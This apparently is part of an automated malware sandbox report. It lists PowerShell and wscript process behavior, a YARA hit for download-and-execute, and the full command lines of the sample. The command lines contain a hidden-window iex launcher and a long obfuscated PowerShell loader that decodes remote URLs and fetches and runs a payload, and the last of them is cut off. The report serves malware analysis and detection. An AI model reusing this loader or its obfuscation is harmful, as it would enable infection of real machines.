          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6103Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3449Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4436Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5364Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5389Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4408Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6164Thread sleep time: -11990383647911201s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7640Thread sleep count: 4436 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7676Thread sleep count: 5364 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5876Thread sleep time: -11990383647911201s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1360Thread sleep time: -9223372036854770s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: powershell.exe, 00000005.00000002.1410489118.000001B64639B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tEventVmNetworkAdapter',
          Source: powershell.exe, 00000005.00000002.1410489118.000001B64639B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Remove-NetEventVmNetworkAdapter',
          Source: powershell.exe, 00000005.00000002.1410489118.000001B64639B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
          Source: powershell.exe, 00000005.00000002.1410489118.000001B64639B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapterX
          Source: powershell.exe, 00000005.00000002.1410489118.000001B644999000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
          Source: powershell.exe, 00000002.00000002.1606506810.000002CD5FD1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll|
          Source: powershell.exe, 00000005.00000002.1410489118.000001B644999000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
          Source: powershell.exe, 00000005.00000002.1410489118.000001B64639B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapterX
          Source: powershell.exe, 00000005.00000002.1410489118.000001B64639B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
          Source: powershell.exe, 00000005.00000002.1410489118.000001B64639B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapterX
          Source: powershell.exe, 00000005.00000002.1410489118.000001B64639B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
          Source: powershell.exe, 00000009.00000002.2658934966.0000022F39763000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWI
          Source: powershell.exe, 00000005.00000002.1410489118.000001B64639B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Add-NetEventVmNetworkAdapter',
          Source: powershell.exe, 00000005.00000002.1410489118.000001B64639B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Get-NetEventVmNetworkAdapter',
          Source: powershell.exe, 00000005.00000002.1410489118.000001B644999000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
          Source: powershell.exe, 00000005.00000002.1410489118.000001B64639B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Yara detected Powershell download and execute
          Source: Yara matchFile source: amsi64_8104.amsi.csv, type: OTHER
          Source: Yara matchFile source: amsi64_8156.amsi.csv, type: OTHER
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8104, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8156, type: MEMORYSTR
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\utwxgh.vbs'"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\sz3.vbs" Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Succesfulde.blo && echo t"Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'anetholes klosetternes venushaar paralalia unyttigst stokkemetoder scanted129 loftrum243 nondissipatedly smashendes sammenlignings areographer articulant prossies vesiculating supermishap adolfine prostyle exerted torsken vespoid svejsere frotteers kvrulanter anetholes klosetternes venushaar paralalia unyttigst stokkemetoder scanted129 loftrum243 nondissipatedly smashendes sammenlignings areographer articulant prossies vesiculating supermishap adolfine prostyle exerted torsken vespoid svejsere frotteers kvrulanter';if (${host}.currentculture) {$bellisserne++;}function gaardspladsens($agerendes){$dafter135=$agerendes.length-$bellisserne;$unburden='substri';$unburden+='ng';for( $unminimizing=5;$unminimizing -lt $dafter135;$unminimizing+=6){$anetholes+=$agerendes.$unburden.invoke( $unminimizing, $bellisserne);}$anetholes;}function sanktionjtr($epigyne){ . ($emanciperingerne) ($epigyne);}$forlngelsers=gaardspladsens 'ol ermtyvekodi.elzcoenoi fronl heldl.nfusanatro/e.cam5unbri.avlsh0koord fo.b(po.omw acceifravrnamentd unpuorealkw zoonsmyxom .ejsn .hudtrecor unend1turne0,npow.zymoc0dacty;predo f,skewantipiseptingu,gn6kundg4brn,b;colla overixforsy6af ta4 malt;fo.ew lawserprepov kom,:barnl1for e2incom1tom,t.te,eo0alloc)b.ytk vill,g skyte retrc kldnk maveochili/l.tre2redis0nazil1tling0c rci0zitta1trkas0nonco1 slu selecfm.ssaiskyd rsi ine ampf .ostochevixdemob/trodd1und.r2ser m1earmu.stra,0exagg ';$fangstknivens=gaardspladsens 'imparupremosaromaeballar unfr-lect,apliengripo,e excenrubritdefin ';$unyttigst=gaardspladsens 'afvrgh danstallesth.stepkommesbevi,: k.nt/dosme/ forgwiter.wpal mwneur..houslavagarlc ccymklovnr hemawannelaskjerd.ndta. svrvcunkinosultampimps/,tammwparanh skva/sp.cksunin,ulo hiborgieostorkrsamtadoptrnitap.lnresunecommerpaxone,hapengowlkdpingeerokkes,usti7affld8unem..,eadmsunharmde eniv,nre>microhforlotsteretkniplpkonklstillg:lingu/rengr/ dimyw susiwbreg.w,onst. samle domsrggepupargui-appelrn,rmaoopryky ethea akkrlgarvk-protoc kandrno.atofe tswfejlmnmesop. decaiembaln irkefresteoanh l/ cifrwchanchattak/,adios alaru.ountbindlsoparaprpian.d scrai thorns.ptiefin.irk ntaechantnvegetd fingei,glosguden7 bekr8abrik.,ydroskri sm lddeim.tte ';$deaktiverende=gaardspladsens 'panor> atol ';$emanciperingerne=gaardspladsens 'bru.hiblideerut,exfyl e ';$almengjordes='loftrum243';$cometlike = gaardspladsens ' h 